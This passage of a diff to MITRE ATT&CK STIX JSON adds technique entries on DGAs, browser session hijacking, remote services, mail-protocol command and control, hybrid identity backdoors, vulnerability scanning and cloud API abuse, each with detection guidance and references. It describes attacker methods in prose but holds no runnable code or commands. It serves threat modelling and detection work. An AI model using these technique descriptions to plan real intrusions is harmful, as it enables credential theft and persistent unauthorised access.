SpectorOps Subverting Trust Sept 2017)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Autoruns Analysis", + "Digital Certificate Validation", + "User Mode Signature Validation", + "Application Control" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc", + "created": "2020-02-05T19:34:04.910Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1553/003", + "external_id": "T1553.003" + }, + { + "source_name": "Entrust Enable CAPI2 Aug 2017", + "description": "Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.", + "url": "http://www.entrust.net/knowledge-base/technote.cfm?tn=8165" + }, + { + "source_name": "GitHub SIP POC Sept 2017", + "description": "Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.", + "url": "https://github.com/mattifestation/PoCSubjectInterfacePackage" + }, + { + "source_name": "SpectorOps Subverting Trust Sept 2017", + "description": "Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved January 31, 2018.", + "url": "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf" + }, + { + "source_name": "Microsoft Catalog Files and Signatures April 2017", + "description": "Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.", + "url": "https://docs.microsoft.com/windows-hardware/drivers/install/catalog-files" + }, + { + "source_name": "Microsoft Audit Registry July 2012", + "description": "Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/dd941614(v=ws.10)" + }, + { + "source_name": "Microsoft Registry Auditing Aug 2016", + "description": "Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.", + "url": "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn311461(v=ws.11)" + }, + { + "source_name": "Microsoft Authenticode", + "description": "Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.", + "url": "https://msdn.microsoft.com/library/ms537359.aspx" + }, + { + "source_name": "Microsoft WinVerifyTrust", + "description": "Microsoft. (n.d.). WinVerifyTrust function. Retrieved January 31, 2018.", + "url": "https://msdn.microsoft.com/library/windows/desktop/aa388208.aspx" + }, + { + "source_name": "EduardosBlog SIPs July 2008", + "description": "Navarro, E. (2008, July 11). SIP’s (Subject Interface Package) and Authenticode. Retrieved January 31, 2018.", + "url": "https://blogs.technet.microsoft.com/eduardonavarro/2008/07/11/sips-subject-interface-package-and-authenticode/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Domain Generation Algorithms", + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Sylvain Gil, Exabeam", + "Barry Shteiman, Exabeam", + "Ryan Benson, Exabeam" + ], + "x_mitre_detection": "Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.\n\nMachine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--54456690-84de-4538-9101-643e26437e09", + "created": "2019-02-18T17:22:57.831Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1483", + "external_id": "T1483" + }, + { + "source_name": "Cybereason Dissecting DGAs", + "description": "Sternfeld, U. (2016). Dissecting Domain Generation Algorithms: Eight Real World DGA Variants. Retrieved February 18, 2019.", + "url": "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf" + }, + { + "source_name": "Cisco Umbrella DGA", + "description": "Scarfo, A. (2016, October 10). Domain Generation Algorithms – Why so effective?. Retrieved February 18, 2019.", + "url": "https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/" + }, + { + "source_name": "Unit 42 DGA Feb 2019", + "description": "Unit 42. (2019, February 7). Threat Brief: Understanding Domain Generation Algorithms (DGA). Retrieved February 19, 2019.", + "url": "https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/" + }, + { + "source_name": "Talos CCleanup 2017", + "description": "Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast Number of Machines at Risk. Retrieved March 9, 2018.", + "url": "http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html" + }, + { + "source_name": "Akamai DGA Mitigation", + "description": "Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of Domain Generation Algorithms. Retrieved February 18, 2019.", + "url": "https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html" + }, + { + "source_name": "FireEye POSHSPY April 2017", + "description": "Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html" + }, + { + "source_name": "ESET Sednit 2017 Activity", + "description": "ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.", + "url": "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" + }, + { + "source_name": "Data Driven Security DGA", + "description": "Jacobs, J. (2014, October 2). Building a DGA Classifier: Part 2, Feature Engineering. Retrieved February 18, 2019.", + "url": "https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/" + }, + { + "source_name": "Pace University Detecting DGA May 2017", + "description": "Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically Generated Domains Using Data Visualization and N-Grams Methods . Retrieved April 26, 2019.", + "url": "http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf" + }, + { + "source_name": "Elastic Predicting DGA", + "description": "Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November 2). Predicting Domain Generation Algorithms with Long Short-Term Memory Networks. Retrieved April 26, 2019.", + "url": "https://arxiv.org/pdf/1611.00791.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Browser Session Hijacking", + "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Justin Warner, ICEBRG" + ], + "x_mitre_detection": "This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. New processes may not be created and no additional software dropped to disk. Authentication logs can be used to audit logins to specific web applications, but determining malicious logins versus benign logins may be difficult if activity matches typical user behavior. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--544b0346-29ad-41e1-a808-501bb4193f47", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1185", + "external_id": "T1185" + }, + { + "source_name": "Wikipedia Man in the Browser", + "description": "Wikipedia. (2017, October 28). Man-in-the-browser. Retrieved January 10, 2018.", + "url": "https://en.wikipedia.org/wiki/Man-in-the-browser" + }, + { + "source_name": "Cobalt Strike Browser Pivot", + "description": "Mudge, R. (n.d.). Browser Pivoting. Retrieved January 10, 2018.", + "url": "https://www.cobaltstrike.com/help-browser-pivoting" + }, + { + "source_name": "ICEBRG Chrome Extensions", + "description": "De Tore, M., Warner, J. (2018, January 15). MALICIOUS CHROME EXTENSIONS ENABLE CRIMINALS TO IMPACT OVER HALF A MILLION USERS AND GLOBAL BUSINESSES. Retrieved January 17, 2018.", + "url": "https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses" + }, + { + "source_name": "cobaltstrike manual", + "description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.", + "url": "https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-03-01T15:35:38.299Z", + "name": "Remote Services", + "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Dan Borges, @1njection" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement. \n\nUse of applications such as ARD may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using these applications. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. \n\nIn macOS, you can review logs for \"screensharingd\" and \"Authentication\" event messages. Monitor network connections regarding remote management (ports tcp:3283 and tcp:5900) and for remote login (port tcp:22).(Citation: Lockboxx ARD 2019)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "IaaS" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Active remote service accepting connections and valid credentials" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--54a649ff-439a-41a4-9856-8d144a2551ba", + "created": "2017-05-31T21:30:29.858Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1021", + "external_id": "T1021" + }, + { + "source_name": "Apple Remote Desktop Admin Guide 3.3", + "description": "Apple. (n.d.). Apple Remote Desktop Administrator Guide Version 3.3. Retrieved October 5, 2021.", + "url": "https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf" + }, + { + "source_name": "Remote Management MDM macOS", + "description": "Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.", + "url": "https://support.apple.com/en-us/HT209161" + }, + { + "source_name": "Kickstart Apple Remote Desktop commands", + "description": "Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.", + "url": "https://support.apple.com/en-us/HT201710" + }, + { + "source_name": "Lockboxx ARD 2019", + "description": "Dan Borges. (2019, July 21). MacOS Red Teaming 206: ARD (Apple Remote Desktop Protocol). Retrieved September 10, 2021.", + "url": "http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html" + }, + { + "source_name": "FireEye 2019 Apple Remote Desktop", + "description": "Jake Nicastro, Willi Ballenthin. (2019, October 9). Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil. Retrieved August 16, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html" + }, + { + "source_name": "TechNet Remote Desktop Services", + "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.", + "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx" + }, + { + "source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", + "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.", + "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins" + }, + { + "source_name": "SSH Secure Shell", + "description": "SSH.COM. (n.d.). SSH (Secure Shell). Retrieved March 23, 2020.", + "url": "https://www.ssh.com/ssh" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-16T12:28:59.928Z", + "name": "Mail Protocols", + "description": "Adversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b", + "created": "2020-03-15T16:21:45.131Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1071/003", + "external_id": "T1071.003" + }, + { + "source_name": "FireEye APT28", + "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.", + "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-11-08T14:00:00.188Z", + "name": "Hybrid Identity", + "description": "Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. \n\nMany organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud \n* Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory \n* Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD \n\nAD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. \n\nBy modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "SaaS", + "Google Workspace", + "Office 365", + "IaaS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--54ca26f3-c172-4231-93e5-ccebcac2161f", + "created": "2022-09-28T13:29:53.354Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1556/007", + "external_id": "T1556.007" + }, + { + "source_name": "Azure AD Connect for Read Teamers", + "description": "Adam Chester. (2019, February 18). Azure AD Connect for Red Teamers. Retrieved September 28, 2022.", + "url": "https://blog.xpnsec.com/azuread-connect-for-redteam/" + }, + { + "source_name": "AADInternals Azure AD On-Prem to Cloud", + "description": "Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.", + "url": "https://o365blog.com/post/on-prem_admin/" + }, + { + "source_name": "MagicWeb", + "description": "Microsoft Threat Intelligence Center, Microsoft Detection and Response Team, Microsoft 365 Defender Research Team . (2022, August 24). MagicWeb: NOBELIUM’s post-compromise trick to authenticate as anyone. Retrieved September 28, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/" + }, + { + "source_name": "Azure AD Hybrid Identity", + "description": "Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.", + "url": "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn" + }, + { + "source_name": "Mandiant Azure AD Backdoors", + "description": "Mike Burns. (2020, September 30). Detecting Microsoft 365 and Azure Active Directory Backdoors. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Vulnerability Scanning", + "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4", + "created": "2020-10-02T16:55:16.047Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1595/002", + "external_id": "T1595.002" + }, + { + "source_name": "OWASP Vuln Scanning", + "description": "OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.", + "url": "https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Cloud API", + "description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://attack.mitre.org/techniques/T1059/001) modules like Azure for PowerShell(Citation: Microsoft - Azure PowerShell), or software developer kits (SDKs) available for languages such as [Python](https://attack.mitre.org/techniques/T1059/006). \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001) and [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Ozan Olali", + "Nichols Jasper", + "Jason Sevilla", + "Marcus Weeks", + "Caio Silva" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Azure AD", + "Office 365", + "SaaS", + "Google Workspace" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_remote_support": false, + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "created": "2022-03-17T13:28:24.989Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1059/009", + "external_id": "T1059.009" + }, + { + "source_name": "Microsoft - Azure PowerShell", + "description": "Microsoft. (2014, December 12). Azure/azure-powershell. Retrieved March 24, 2023.", + "url": "https://github.com/Azure/azure-powershell" + } + ], + "object_marking_refs": [ + 